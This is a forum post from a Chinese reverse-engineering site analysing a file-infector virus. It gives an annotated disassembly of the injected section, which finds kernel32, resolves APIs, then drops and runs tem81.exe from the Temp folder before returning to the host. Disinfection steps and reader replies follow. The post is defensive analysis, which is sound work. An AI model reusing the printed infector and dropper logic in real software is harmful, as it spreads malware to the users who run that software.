吾爱破解 - LCG - LSG |安卓破解|病毒分析|www.52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 34705|回复: 35
收起左侧

[PC样本分析] 一个感染样本的简单分析 by ximo[LSG]

  [复制链接]
ximo 发表于 2009-5-21 19:00
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
今天刚发现的,比较简单,于是就来简单分析下吧。
该感染样本很简单,新加了个区段放病毒执行代码,执行病毒代码,最后跳回原入口点来执行原文件。
下面就是感染后的代码的简单分析:
.bs:007DC000 ; =============== S U B R O U T I N E =======================================
.bs:007DC000
.bs:007DC000
.bs:007DC000                 public start
.bs:007DC000 start           proc near
.bs:007DC000
.bs:007DC000 var_44          = dword ptr -44h
.bs:007DC000
.bs:007DC000                 call    $+5
.bs:007DC005                 pop     ebx
.bs:007DC006                 sub     ebx, (offset loc_401002+3) ; 经典的重定位代码
.bs:007DC006                                         ; ebx=3DB000,以此值作为相应的基址,来进行相关的计算
.bs:007DC006                                         ; 在下面的获取各API中会看到
.bs:007DC00C                 mov     edi, [esp+0]    ; 该处的ESP值即为入口点的ESP值
.bs:007DC00C                                         ; 入口点的初始ESP值是指向ExitThread的
.bs:007DC00C                                         ; 该样本正是利用这点,来暴力搜索来取得kernel32.dll的基址的
.bs:007DC00F                 and     edi, 0FFFF0000h ; edi==7c810000
.bs:007DC00F                                         ; 该值为开始搜索的地址
.bs:007DC015
.bs:007DC015 loc_7DC015:                             ; CODE XREF: start+38j
.bs:007DC015                 cmp     word ptr [edi], 5A4Dh ; 判断是否为“MZ”值,以次来判断是否是kernel32.dll的头部
.bs:007DC015                                         ; 从而取得kernel32.dll的地址
.bs:007DC01A                 jnz     short loc_7DC02A ; 不是则跳
.bs:007DC01C                 mov     esi, edi        ; ESI==EDI==GetModuleHandle("kernel32.dll")
.bs:007DC01C                                         ; 也就是kernel32.dll的基址
.bs:007DC01E                 add     esi, [esi+3Ch]  ; ESI=*(esi+3c),也就是指向PE Header
.bs:007DC021                 cmp     word ptr [esi], 4550h ; 判断是否为“PE”,以次来验证是否为有效PE文件
.bs:007DC026                 jnz     short loc_7DC02A ; 不是则跳
.bs:007DC028                 jmp     short loc_7DC03A ; 得到了kernel32.dll的基址
.bs:007DC028                                         ; 下面就可以很容易的得到GetProcAddress了
.bs:007DC028                                         ; 下面这段代码就是搜索kernel32.dll的输出表,来得到GetProcAddress的地址的
.bs:007DC02A ; ---------------------------------------------------------------------------
.bs:007DC02A
.bs:007DC02A loc_7DC02A:                             ; CODE XREF: start+1Aj
.bs:007DC02A                                         ; start+26j
.bs:007DC02A                 sub     edi, 10000h     ; 每次向上减10000h,来继续暴力搜索kernel32.dll的基址
.bs:007DC030                 cmp     edi, 70000000h  ; 比较下界为70000000h
.bs:007DC036                 jb      short loc_7DC03A ; 得到了kernel32.dll的基址
.bs:007DC036                                         ; 下面就可以很容易的得到GetProcAddress了
.bs:007DC036                                         ; 下面这段代码就是搜索kernel32.dll的输出表,来得到GetProcAddress的地址的
.bs:007DC038                 jmp     short loc_7DC015 ; 循环去搜索
.bs:007DC038                                         ; 以上这段代码就是利用原始入口的ESP制向ExitThread
.bs:007DC038                                         ; 而ExitThread位于kernel32.dll
.bs:007DC038                                         ; 以次来暴力搜索,得到kernel32.dll的基址的
.bs:007DC03A ; ---------------------------------------------------------------------------
.bs:007DC03A
.bs:007DC03A loc_7DC03A:                             ; CODE XREF: start+28j
.bs:007DC03A                                         ; start+36j
.bs:007DC03A                 mov     dword ptr ds:(loc_4011D8+1)[ebx], edi ; 得到了kernel32.dll的基址
.bs:007DC03A                                         ; 下面就可以很容易的得到GetProcAddress了
.bs:007DC03A                                         ; 下面这段代码就是搜索kernel32.dll的输出表,来得到GetProcAddress的地址的
.bs:007DC040                 mov     esi, [esi+78h]  ; 读取kernel32.dll的输出表
.bs:007DC040                                         ; ESI的值为输出表的RVA,EDI为 ImageBase
.bs:007DC043                 add     esi, edi
.bs:007DC045                 push    esi
.bs:007DC046                 mov     ebp, [esi+18h]
.bs:007DC049                 mov     esi, [esi+20h]
.bs:007DC04C                 add     esi, edi
.bs:007DC04E                 xor     edx, edx
.bs:007DC050
.bs:007DC050 loc_7DC050:                             ; CODE XREF: start+75j
.bs:007DC050                 push    esi
.bs:007DC051                 mov     edi, [esi]
.bs:007DC053                 add     edi, dword ptr ds:(loc_4011D8+1)[ebx]
.bs:007DC059                 lea     esi, dword_40119E[ebx] ; “GetProcAddress”字符串
.bs:007DC05F                 mov     ecx, 0Fh
.bs:007DC064                 repe cmpsb
.bs:007DC066                 jnz     short loc_7DC06E
.bs:007DC068                 pop     esi
.bs:007DC069                 mov     edx, esi
.bs:007DC06B                 pop     esi
.bs:007DC06C                 jmp     short loc_7DC07F ; 获取了GetProcAddress后,下面就是读取相关API了
.bs:007DC06E ; ---------------------------------------------------------------------------
.bs:007DC06E
.bs:007DC06E loc_7DC06E:                             ; CODE XREF: start+66j
.bs:007DC06E                 pop     esi
.bs:007DC06F                 add     esi, 4
.bs:007DC072                 inc     edx
.bs:007DC073                 cmp     edx, ebp
.bs:007DC075                 jb      short loc_7DC050 ; 循环进行搜索,以得到GetProcAddress地址
.bs:007DC077                 sub     esp, 4
.bs:007DC07A                 jmp     loc_7DC199      ; 若搜索不到,直接跳回去到原始入口点
.bs:007DC07A                                         ; 此地方可以作为修复感染的突破点之一
.bs:007DC07A                                         ; 把007DC075的jb改jmp,即可让其不执行危险的动作。
.bs:007DC07F ; ---------------------------------------------------------------------------
.bs:007DC07F
.bs:007DC07F loc_7DC07F:                             ; CODE XREF: start+6Cj
.bs:007DC07F                 sub     edx, [esi+20h]  ; 获取了GetProcAddress后,下面就是读取相关API了
.bs:007DC082                 mov     eax, dword ptr ds:(loc_4011D8+1)[ebx]
.bs:007DC088                 sub     edx, eax
.bs:007DC08A                 shr     edx, 1
.bs:007DC08C                 add     edx, [esi+24h]
.bs:007DC08F                 add     edx, eax
.bs:007DC091                 movzx   eax, word ptr [edx]
.bs:007DC094                 shl     eax, 2
.bs:007DC097                 add     eax, [esi+1Ch]
.bs:007DC09A                 add     eax, dword ptr ds:(loc_4011D8+1)[ebx]
.bs:007DC0A0                 mov     eax, [eax]
.bs:007DC0A2                 add     eax, dword ptr ds:(loc_4011D8+1)[ebx] ; eax的值即为GetProcAddress的地址
.bs:007DC0A8                 mov     edi, eax
.bs:007DC0AA                 mov     ebp, esp
.bs:007DC0AC                 mov     edx, dword ptr ds:(loc_4011D8+1)[ebx]
.bs:007DC0B2                 lea     eax, (loc_4011AB+2)[ebx] ; 指向GetTempPathA字符串
.bs:007DC0B8                 push    eax
.bs:007DC0B9                 push    edx
.bs:007DC0BA                 call    edi             ; 调用GetProcAddress来获取GetTempPathA地址
.bs:007DC0BA                                         ; 以下均为这种形式:
.bs:007DC0BA                                         ; eax=GetProcAddress("edi")
.bs:007DC0BC                 sub     esp, 104h
.bs:007DC0C2                 push    esp
.bs:007DC0C3                 push    104h
.bs:007DC0C8                 call    eax             ; 调用GetTempPathA
.bs:007DC0CA                 lea     eax, (loc_4011B8+2)[ebx] ; 指向字符串“lstrcatA”
.bs:007DC0D0                 push    eax
.bs:007DC0D1                 mov     edx, dword ptr ds:(loc_4011D8+1)[ebx]
.bs:007DC0D7                 push    edx
.bs:007DC0D8                 call    edi
.bs:007DC0DA                 lea     ecx, (loc_4011C2+1)[ebx] ; tem81.exe
.bs:007DC0E0                 push    ecx
.bs:007DC0E1                 mov     ecx, esp
.bs:007DC0E3                 add     ecx, 4
.bs:007DC0E6                 push    ecx
.bs:007DC0E7                 call    eax
.bs:007DC0E9                 lea     eax, (loc_4011CB+2)[ebx] ; CreateFileA
.bs:007DC0EF                 push    eax
.bs:007DC0F0                 mov     edx, dword ptr ds:(loc_4011D8+1)[ebx]
.bs:007DC0F6                 push    edx
.bs:007DC0F7                 call    edi
.bs:007DC0F9                 mov     ecx, esp
.bs:007DC0FB                 push    0
.bs:007DC0FD                 push    80h
.bs:007DC102                 push    2
.bs:007DC104                 push    0
.bs:007DC106                 push    0
.bs:007DC108                 push    0C0000000h
.bs:007DC10D                 push    ecx
.bs:007DC10E                 call    eax             ; 创建C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tem81.exe
.bs:007DC110                 mov     esi, eax
.bs:007DC112                 lea     ecx, (loc_401203+1)[ebx] ; WriteFile
.bs:007DC118                 push    ecx
.bs:007DC119                 push    ecx
.bs:007DC11A                 mov     edx, dword ptr ds:(loc_4011D8+1)[ebx]
.bs:007DC120                 push    edx
.bs:007DC121                 call    edi
.bs:007DC123                 pop     ecx
.bs:007DC124                 push    0
.bs:007DC126                 push    ecx
.bs:007DC127                 add     ecx, 0Ah
.bs:007DC12A                 mov     edx, [ecx]      ; 所要写入内容地址为[ECX]=[007DC201]
.bs:007DC12C                 push    edx
.bs:007DC12D                 push    ecx
.bs:007DC12E                 mov     edx, 905A4Dh
.bs:007DC133                 mov     [ecx], edx
.bs:007DC135                 push    esi
.bs:007DC136                 call    eax
.bs:007DC138                 lea     eax, loc_4011EC[ebx] ; CloseHandle
.bs:007DC13E                 push    eax
.bs:007DC13F                 mov     edx, dword ptr ds:(loc_4011D8+1)[ebx]
.bs:007DC145                 push    edx
.bs:007DC146                 call    edi
.bs:007DC148                 push    esi
.bs:007DC149                 call    eax
.bs:007DC14B                 lea     eax, loc_4011DD[ebx] ; CreateProcessA
.bs:007DC151                 push    eax
.bs:007DC152                 mov     edx, dword ptr ds:(loc_4011D8+1)[ebx]
.bs:007DC158                 push    edx
.bs:007DC159                 call    edi
.bs:007DC15B                 sub     esp, 44h
.bs:007DC15E                 mov     edx, esp
.bs:007DC160                 mov     esi, 0
.bs:007DC165                 mov     ecx, 11h
.bs:007DC16A
.bs:007DC16A loc_7DC16A:                             ; CODE XREF: start+16Fj
.bs:007DC16A                 mov     [edx], esi
.bs:007DC16C                 add     edx, 4
.bs:007DC16F                 loop    loc_7DC16A
.bs:007DC171                 mov     edx, 44h
.bs:007DC176                 mov     [esp+44h+var_44], edx
.bs:007DC179                 sub     esp, 10h
.bs:007DC17C                 mov     edx, esp
.bs:007DC17E                 push    esp
.bs:007DC17F                 add     edx, 10h
.bs:007DC182                 push    edx
.bs:007DC183                 push    0
.bs:007DC185                 push    0
.bs:007DC187                 push    0
.bs:007DC189                 push    0
.bs:007DC18B                 push    0
.bs:007DC18D                 push    0
.bs:007DC18F                 push    0
.bs:007DC191                 add     edx, 44h
.bs:007DC194                 push    edx
.bs:007DC195                 call    eax             ; 创建进程,来运行刚创建的文件tem81.exe
.bs:007DC197                 mov     esp, ebp
.bs:007DC199
.bs:007DC199 loc_7DC199:                             ; CODE XREF: start+7Aj
.bs:007DC199                 jmp     sub_467393      ; 病毒代码执行完毕,跳到原始入口点去执行
.bs:007DC199 start           endp
.bs:007DC199
.bs:007DC199 ; ---------------------------------------------------------------------------

修复也很简单:
1.修改入口点地址:
设原入口地址为EP,读取EP+19Ah的值(读取4个字节)为A
则修改后的值为:EP+198h+5h+A
以该样本为例:
入口点RVA=003DC000,转化成offset=003C3000
读取offset+19Ah=3C319A处的值为(4字节):F5 B1 C8 FF,即FFC8B1F5
则新入口RVA=3DC000+198h+5h+FFC8B1F5=3DC19D-(FFFFFFFF-FFC8B1F5)=3DC19D-374E0A=67393
则修改新入口点的值为69393
2.截去被病毒新加的.bs区段

附件为该感染样本

6d463abc6587c715167856031ea13b5a.rar

1.53 MB, 下载次数: 182, 下载积分: 吾爱币 -1 CB

免费评分

参与人数 1威望 +1 收起 理由
roxiel + 1 精品文章

查看全部评分

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

szdjcn 发表于 2009-5-21 19:05
沙发,,膜拜。高人,徐MM
wgz001 发表于 2009-5-21 19:07
faust 发表于 2009-5-21 20:34
zzage 发表于 2009-5-21 22:34
恩!
不咋样!
li707392 发表于 2009-5-21 20:40

嗯,希望LS的,能多发些可以咋样的文章来分享一下!
wgz001 发表于 2009-5-21 22:45
恩!
不咋样!
li707392 发表于 2009-5-21 20:40


期待精品文章  
joviron 发表于 2009-5-26 20:58
为什么我下载的样本打不开啊?!想自己来试试...
xxxfree 发表于 2009-5-28 12:46
很详细,学习下 :)
O_o 发表于 2009-11-14 20:23
学习了,  给楼主发个消息扣了5B
gtyre1 发表于 2009-11-17 15:26
只有先膜拜了~:)eee
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则 警告:本版块禁止灌水或回复与主题无关内容,违者重罚!

快速回复 收藏帖子 返回列表 搜索

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-4-19 13:54

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表